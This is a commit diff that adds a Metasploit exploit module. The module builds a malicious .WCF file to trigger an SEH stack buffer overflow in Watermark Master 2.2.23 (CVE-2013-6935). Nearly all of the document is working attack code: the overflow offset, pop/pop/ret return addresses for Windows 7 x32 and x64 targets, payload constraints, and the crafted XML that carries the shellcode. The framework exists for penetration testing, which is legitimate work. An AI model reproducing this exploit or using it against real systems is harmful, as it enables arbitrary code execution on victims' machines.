Land #5842, watermark fileformat exploit

modules/exploits/windows/fileformat/watermark_master.rb

@@ -0,0 +1,98 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::Seh
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'    => 'Watermark Master Buffer Overflow (SEH)',
+      'Description'  => %q{
+          This module exploits a stack based buffer overflow in Watermark Master 2.2.23 when
+          processing a specially crafted .WCF file. This vulnerability could be
+          exploited by a remote attacker to execute arbitrary code on the target
+          machine by enticing a user of Watermark Master to open a malicious .WCF file.
+      },
+      'License'    => MSF_LICENSE,
+      'Author'    =>
+        [
+          'metacom',  # Original discovery
+          'Andrew Smith',  # MSF Module
+        ],
+      'References'  =>
+        [
+          [ 'OSVDB', '99226' ],
+          [ 'CVE', '2013-6935'],
+          [ 'EBD', '29327' ]
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'process',
+        },
+      'Platform'  => 'win',
+      'Payload'  =>
+        {
+          'BadChars' => "\x00\x0a\x0d\x3c\x22\x26",
+          'DisableNops' => false,
+          'Space' => 7276
+        },
+
+      'Targets'    =>
+        [
+          [ 'Windows 7 x32 - Watermark Master 2.2.23',
+            {
+              'Ret'     =>  0x10015f2d, #p/p/r | CommonClassesMFC.dll
+              'Offset'  =>  516
+            }
+          ],
+          [ 'Windows 7 x64 - Watermark Master 2.2.23',
+            {
+              'Ret'     =>  0x1001329a, #p/p/r | CommonClassesMFC.dll
+              'Offset'  =>  516
+            }
+          ],
+        ],
+      'Privileged'  => false,
+      'DisclosureDate'  => 'Nov 1 2013',
+      'DefaultTarget'  => 0))
+
+    register_options([OptString.new('FILENAME', [ false, 'The file name.', 'msf.wcf']),], self.class)
+
+  end
+
+  def exploit
+
+    buffer = rand_text(target['Offset'])
+    buffer << generate_seh_record(target.ret)
+    buffer << payload.encoded
+    buffer << rand_text(18000 - buffer.length)
+
+    file = %Q|<?xml version="1.0" encoding="Windows-1252" ?><config ver="2.2.23.00">
+<cols name="Files"/>
+<cols name="Profiles">
+<Property name="Profile">
+<cols name="Watermarks"/>
+<cols name="Timelines"/>
+<cols name="Streams">
+<Property name="Stream">
+<Value name="SourcePath" type="8" value="#{buffer}"/>
+</Property>
+</cols>
+<cols name=""/>
+</Property>
+</cols>
+</config>|
+
+    print_status("Creating '#{datastore['FILENAME']}' file ...")
+    file_create(file)
+
+  end
+end
+